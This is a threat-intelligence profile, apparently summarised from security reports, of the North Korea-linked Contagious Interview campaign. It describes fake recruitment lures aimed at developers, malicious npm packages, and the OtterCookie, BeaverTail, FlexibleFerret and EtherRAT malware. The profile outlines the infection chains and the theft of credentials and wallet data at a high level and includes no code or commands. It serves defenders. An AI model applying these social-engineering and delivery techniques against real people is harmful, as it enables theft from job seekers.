Contagious Interview (DPRK)

DPRK (North Korea) is a state-sponsored threat actor referenced in the provided content as operating or supporting multiple campaigns and malware families, including Contagious Interview, React2Shell activity, and related DPRK-aligned operations. Known aliases in the content include Contagious Interview and DPRK-aligned operators. The content describes an ongoing DPRK-linked Contagious Interview campaign that targets software developers, especially blockchain, Web3, and other job-seeking development professionals, through fake job interviews, staged hiring tasks, and trojanized meeting or assessment applications. In this activity, victims are instructed to execute malicious commands or install malicious packages and applications. The campaign has used more than 197 malicious npm packages with more than 31,000 downloads since October 10, and has relied on GitHub and Vercel infrastructure for payload delivery and command-and-control. Malware associated with this activity includes OtterCookie, described as a multistage infostealer and RAT, and BeaverTail, described as a downloader and stealer delivered via trojanized meeting apps and fake recruitment lures. Reported capabilities in the content include theft of credentials, cryptocurrency wallet data, clipboard contents, browser data, keystrokes, and screenshots. The content also attributes FlexibleFerret to DPRK-aligned operators as part of the Contagious Interview operation. FlexibleFerret is described as a macOS malware family distributed through fake recruitment sites such as evaluza[.]com and proficiencycert[.]com. Victims are socially engineered into running Terminal commands that trigger a multi-stage infection chain involving JavaScript stagers, shell scripts, architecture-specific payloads, persistence via a LaunchAgent, and a Go-based backdoor. Reported capabilities include credential theft, file exfiltration, OS command execution, and use of Dropbox APIs for exfiltration. The campaign is described as targeting macOS users, especially online job seekers, and as an evolution of earlier Contagious Interview activity. Additional DPRK-linked malware and operations mentioned in the content include EtherRAT, described as a novel Ethereum implant used in React2Shell attacks, and SpectralBlur, identified as DPRK malware analyzed in 2024. The content also notes that a malware campaign abused Microsoft VSCode Tasks to deliver Interview malware. Overall, the provided material portrays DPRK as a persistent nation-state actor using social engineering, software supply chain compromise, fake recruitment workflows, and multi-stage malware delivery to target developers and other users of strategic interest.